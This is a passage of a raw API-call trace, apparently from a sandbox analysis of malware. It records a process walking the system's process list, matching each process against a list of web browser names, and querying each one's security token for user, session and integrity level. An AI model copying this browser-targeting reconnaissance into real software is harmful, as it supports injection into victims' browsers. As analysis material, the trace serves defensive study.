returned 1 [0319.515] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0319.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0319.516] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.516] GetLastError () returned 0x7a [0319.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.516] CloseHandle (hObject=0xb8) returned 1 [0319.516] CloseHandle (hObject=0xb4) returned 1 [0319.516] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0319.516] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97178, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.517] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.517] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.517] GetLastError () returned 0x7a [0319.517] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.517] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.517] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.517] CloseHandle (hObject=0xb8) returned 1 [0319.517] CloseHandle (hObject=0xb4) returned 1 [0319.518] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0319.518] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0319.518] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0319.518] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0319.518] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0319.518] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0319.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0319.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0319.518] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.519] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.519] GetLastError () returned 0x7a [0319.519] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.519] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.519] CloseHandle (hObject=0xb8) returned 1 [0319.519] CloseHandle (hObject=0xb4) returned 1 [0319.519] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0319.519] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97a80, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.519] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.520] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.520] GetLastError () returned 0x7a [0319.520] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.520] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.520] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.520] CloseHandle (hObject=0xb8) returned 1 [0319.520] CloseHandle (hObject=0xb4) returned 1 [0319.521] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.521] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.521] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0319.521] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.521] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.521] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0319.521] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.521] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.521] GetLastError () returned 0x7a [0319.522] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.522] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.522] CloseHandle (hObject=0xb8) returned 1 [0319.522] CloseHandle (hObject=0xb4) returned 1 [0319.522] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0319.522] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97e28, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.522] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.522] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.522] GetLastError () returned 0x7a [0319.522] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.523] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.523] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.523] CloseHandle (hObject=0xb8) returned 1 [0319.523] CloseHandle (hObject=0xb4) returned 1 [0319.523] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0319.523] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0319.523] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0319.523] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0319.523] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0319.523] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0319.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0319.524] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.524] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.524] GetLastError () returned 0x7a [0319.524] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.524] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.524] CloseHandle (hObject=0xb8) returned 1 [0319.524] CloseHandle (hObject=0xb4) returned 1 [0319.524] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0319.524] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97fc0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.524] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.524] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.524] GetLastError () returned 0x7a [0319.524] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.525] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.525] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.525] CloseHandle (hObject=0xb8) returned 1 [0319.525] CloseHandle (hObject=0xb4) returned 1 [0319.525] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0319.525] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0319.525] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0319.525] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0319.525] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0319.525] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0319.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0319.526] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.526] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.526] GetLastError () returned 0x7a [0319.526] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.526] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.526] CloseHandle (hObject=0xb8) returned 1 [0319.526] CloseHandle (hObject=0xb4) returned 1 [0319.526] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0319.527] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x984d8, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.527] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.527] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.527] GetLastError () returned 0x7a [0319.527] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.527] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.527] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.527] CloseHandle (hObject=0xb8) returned 1 [0319.527] CloseHandle (hObject=0xb4) returned 1 [0319.528] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0319.528] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0319.528] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0319.528] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0319.528] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0319.528] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0319.528] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.528] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0321.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x260fd04 | out: SystemInformation=0x0, ResultLength=0x260fd04*=0xab60) returned 0xc0000004 [0321.539] VirtualAlloc (lpAddress=0x0, dwSize=0xbb60, flAllocationType=0x1000, flProtect=0x4) returned 0x90000 [0321.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x90000, Length=0xbb60, ResultLength=0x0 | out: SystemInformation=0x90000, ResultLength=0x0) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0321.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0321.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0321.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0321.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0321.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0321.543] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0321.543] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0321.543] GetLastError () returned 0x7a [0321.543] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0321.543] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0321.543] CloseHandle (hObject=0xb8) returned 1 [0321.544] CloseHandle (hObject=0xb4) returned 1 [0321.544] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0321.544] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x988b8, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.544] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0321.544] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0321.544] GetLastError () returned 0x7a [0321.544] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0321.544] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0321.545] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0321.545] CloseHandle (hObject=0xb8) returned 1 [0321.545] CloseHandle (hObject=0xb4) returned 1 [0321.545] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0321.546] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0321.546] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0321.546] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0321.546] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0321.546] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0321.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0321.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0321.546] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0321.546] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0321.546] GetLastError () returned 0x7a [0321.546] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0321.547] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0321.547] CloseHandle (hObject=0xb8) returned 1 [0321.547] CloseHandle (hObject=0xb4) returned 1 [0321.547] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0321.547] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96960, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.547] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0321.547] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0321.548] GetLastError () returned 0x7a [0321.548] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0321.548] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, 